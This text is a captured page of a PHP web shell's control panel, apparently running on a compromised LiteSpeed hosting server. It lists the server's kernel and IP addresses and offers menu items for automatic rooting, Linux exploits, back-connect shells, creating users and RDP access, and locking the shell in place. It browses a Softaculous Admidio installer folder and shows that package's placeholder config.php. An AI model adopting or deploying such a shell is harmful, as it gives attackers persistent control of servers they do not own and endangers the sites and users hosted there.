Linux server123.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 198.54.126.127 | : 216.73.216.107
Cant Read [ /etc/named.conf ]
?8.4.14
ezdajrnh
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
softaculous /
admidio /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
images
[ DIR ]
drwxr-xr-x
?;
php53
[ DIR ]
drwxr-xr-x
?;
php56
[ DIR ]
drwxr-xr-x
?;
php71
[ DIR ]
drwxr-xr-x
?;
php81
[ DIR ]
drwxr-xr-x
?;
php82
[ DIR ]
drwxr-xr-x
admidio.sql
98.74
KB
-rw-r--r--
admidio.zip
14.57
MB
-rw-r--r--
clone.php
6.34
KB
-rw-r--r--
config.php
1.15
KB
-rw-r--r--
edit.php
4.61
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
3.3
KB
-rw-r--r--
fileindex.php
169
B
-rw-r--r--
import.php
4.21
KB
-rw-r--r--
info.xml
2.86
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
5.03
KB
-rw-r--r--
install.xml
28.1
KB
-rw-r--r--
md5
1.1
KB
-rw-r--r--
notes.txt
686
B
-rw-r--r--
update_pass.php
2.02
KB
-rw-r--r--
upgrade.php
6.01
KB
-rw-r--r--
upgrade.xml
346
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php /** *********************************************************************************************** * Configuration file of Admidio * * @copyright The Admidio Team * @see https://www.admidio.org/ * @license https://www.gnu.org/licenses/gpl-2.0.html GNU General Public License v2.0 only *********************************************************************************************** */ // Select your database system for example 'mysql' or 'pgsql' $gDbType = 'mysql'; // Access to the database of the SQL-Server $g_adm_srv = '[[softdbhost]]'; // Host $g_adm_port = null; // Port $g_adm_db = '[[softdb]]'; // Database-Name $g_adm_usr = '[[softdbuser]]'; // Username $g_adm_pw = '[[softdbpass]]'; // Password // Table prefix for Admidio-Tables in database // Example: 'adm' $g_tbl_praefix = '[[dbprefix]]'; // URL to this Admidio installation // Example: 'https://www.admidio.org/example' $g_root_path = '[[softurl]]'; // The name of the timezone in which your organization is located. // This must be one of the strings that are defined here https://www.php.net/manual/en/timezones.php // Example: 'Europe/Berlin' $gTimezone = '[[time_zone]]';
Close